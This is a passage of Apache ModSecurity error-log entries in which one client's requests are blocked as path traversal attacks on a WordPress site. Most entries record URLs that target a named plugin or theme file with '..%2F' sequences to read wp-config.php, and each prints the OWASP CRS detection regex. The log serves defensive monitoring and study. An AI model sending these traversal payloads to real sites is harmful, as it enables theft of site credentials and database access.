"Y8Dw8Y6vAq65Ygpdg5ObIQAAAFI"] [Fri Jan 13 00:49:37.524003 2023] [:error] [pid 31476:tid 140315281311488] [client 185.206.224.212:42578] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/css/css.php"] [unique_id "Y8Dw8aGMrWzzUVMdEhcLkQAAAMY"] [Fri Jan 13 00:49:37.639188 2023] [:error] [pid 31476:tid 140315388712704] [client 185.206.224.212:42580] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/framework/utilities/download/getfile.php"] [unique_id "Y8Dw8aGMrWzzUVMdEhcLkgAAAMI"] [Fri Jan 13 00:49:54.902169 2023] [:error] [pid 31476:tid 140315239347968] [client 185.206.224.212:42648] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive.php?bkpwp_plugin_path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive.php"] [unique_id "Y8DxAqGMrWzzUVMdEhcLnQAAAMs"] [Fri Jan 13 00:49:55.019623 2023] [:error] [pid 31476:tid 140315197384448] [client 185.206.224.212:42650] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Predicate.php"] [unique_id "Y8DxA6GMrWzzUVMdEhcLngAAANA"] [Fri Jan 13 00:49:55.134582 2023] [:error] [pid 31476:tid 140315222562560] [client 185.206.224.212:42652] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Reader.php"] [unique_id "Y8DxA6GMrWzzUVMdEhcLnwAAAM0"] [Fri Jan 13 00:49:55.262429 2023] [:error] [pid 31476:tid 140315306489600] [client 185.206.224.212:42654] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Writer.php"] [unique_id "Y8DxA6GMrWzzUVMdEhcLoAAAAMM"] [Fri Jan 13 00:49:55.393182 2023] [:error] [pid 31476:tid 140315214169856] [client 185.206.224.212:42656] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/Enigma2.php?boarddir=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/Enigma2.php"] [unique_id "Y8DxA6GMrWzzUVMdEhcLoQAAAM4"] [Fri Jan 13 00:49:55.517449 2023] [:error] [pid 31043:tid 140315155420928] [client 185.206.224.212:42658] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/abtest/abtest_admin.php?action=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/abtest/abtest_admin.php"] [unique_id "Y8DxA8x9A9c0KkSpLadP8AAAAJU"] [Fri Jan 13 00:49:55.641646 2023] [:error] [pid 31041:tid 140315130242816] [client 185.206.224.212:42660] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-custom-fields/core/actions/export.php?acf_abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-custom-fields/core/actions/export.php"] [unique_id "Y8DxA8PRCDYHCWWhHpAjnQAAABg"] [Fri Jan 13 00:49:55.756936 2023] [:error] [pid 31041:tid 140315222562560] [client 185.206.224.212:42662] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "Y8DxA8PRCDYHCWWhHpAjngAAAA0"] [Fri Jan 13 00:49:55.872265 2023] [:error] [pid 31041:tid 140315281311488] [client 185.206.224.212:42664] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php"] [unique_id "Y8DxA8PRCDYHCWWhHpAjnwAAAAY"] [Fri Jan 13 00:49:55.991132 2023] [:error] [pid 31041:tid 140315163813632] [client 185.206.224.212:42666] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php?abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php"] [unique_id "Y8DxA8PRCDYHCWWhHpAjoAAAABQ"] [Fri Jan 13 00:49:56.112371 2023] [:error] [pid 31043:tid 140315147028224] [client 185.206.224.212:42668] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php"] [unique_id "Y8DxBMx9A9c0KkSpLadP8QAAAJY"] [Fri Jan 13 00:49:56.227323 2023] [:error] [pid 31043:tid 140315214169856] [client 185.206.224.212:42670] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/apptha-slider-gallery/asgallDownload.php?imgname=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/apptha-slider-gallery/asgallDownload.php"] [unique_id "Y8DxBMx9A9c0KkSpLadP8gAAAI4"] [Fri Jan 13 00:49:56.342713 2023] [:error] [pid 31476:tid 140315256133376] [client 185.206.224.212:42672] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "Y8DxBKGMrWzzUVMdEhcLogAAAMk"] [Fri Jan 13 00:49:56.470788 2023] [:error] [pid 31042:tid 140315239347968] [client 185.206.224.212:42674] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "Y8DxBI6vAq65Ygpdg5ObJQAAAEs"] [Fri Jan 13 00:49:56.585526 2023] [:error] [pid 31042:tid 140315289704192] [client 185.206.224.212:42676] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/bookx/includes/bookx_export.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/bookx/includes/bookx_export.php"] [unique_id "Y8DxBI6vAq65Ygpdg5ObJgAAAEU"] [Fri Jan 13 00:49:56.712766 2023] [:error] [pid 31042:tid 140315230955264] [client 185.206.224.212:42678] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/brandfolder/callback.php?wp_abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "Y8DxBI6vAq65Ygpdg5ObJwAAAEw"] [Fri Jan 13 00:49:56.841236 2023] [:error] [pid 31042:tid 140315405498112] [client 185.206.224.212:42680] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "Y8DxBI6vAq65Ygpdg5ObKAAAAEA"] [Fri Jan 13 00:49:56.965746 2023] [:error] [pid 31042:tid 140315130242816] [client 185.206.224.212:42682] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php"] [unique_id "Y8DxBI6vAq65Ygpdg5ObKQAAAFg"] [Fri Jan 13 00:49:57.084695 2023] [:error] [pid 31043:tid 140315256133376] [client 185.206.224.212:42686] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php"] [unique_id "Y8DxBcx9A9c0KkSpLadP9AAAAIk"] [Fri Jan 13 00:49:57.201527 2023] [:error] [pid 31043:tid 140315264526080] [client 185.206.224.212:42688] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri 